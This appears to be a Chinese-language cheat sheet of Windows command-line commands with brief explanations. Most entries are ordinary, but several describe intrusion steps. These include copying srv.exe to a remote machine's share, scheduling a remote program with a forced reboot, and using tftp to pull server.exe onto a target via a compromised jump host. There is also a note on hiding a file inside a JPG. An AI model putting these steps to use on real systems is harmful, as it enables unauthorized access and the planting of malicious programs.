fc one.txt two.txt > 3st.txt 對比二個文件并把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令

at id號 開啟已注冊的某個計劃任務

at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止

at id號 /delete 停止某個已注冊的計劃任務

at 查看所有的計劃任務

at ip time 程序名(或一個命令) /r 在某時間運行對方某程序并重新啟動計算機

finger username @host 查看最近有哪些用戶登陸

telnet ip 端口 遠和登陸服務器,默認端口為23

open ip 連接到IP（屬telnet登陸后的命令）

telnet 在本機上直接鍵入telnet 將進入本機的telnet

copy 路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件

copy c:srv.exe ip***$ 復制本地c:srv.exe到對方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件

copy ip***$s.exe c: 或:copyip***$*.* 復制對方***i.exe文件（所有文件）至本地C：

xcopy 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件

tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸后，將“IP”的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送

tftp -i 對方IP put c:server.exe 登陸后，上傳本地c:server.exe至主機

ftp ip 端口 用于上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)

route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface

arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息

start 程序名或命令 /max 或/min 新開一個新窗口并最大化（最小化）運行某程序或命令

mem 查看cpu使用情況

attrib 文件名(目錄名) 查看某文件（目錄）的屬性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性

dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間

date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間

set 指定環境變量名稱=要指派給變量的字符 設置環境變量

set 顯示當前所有的環境變量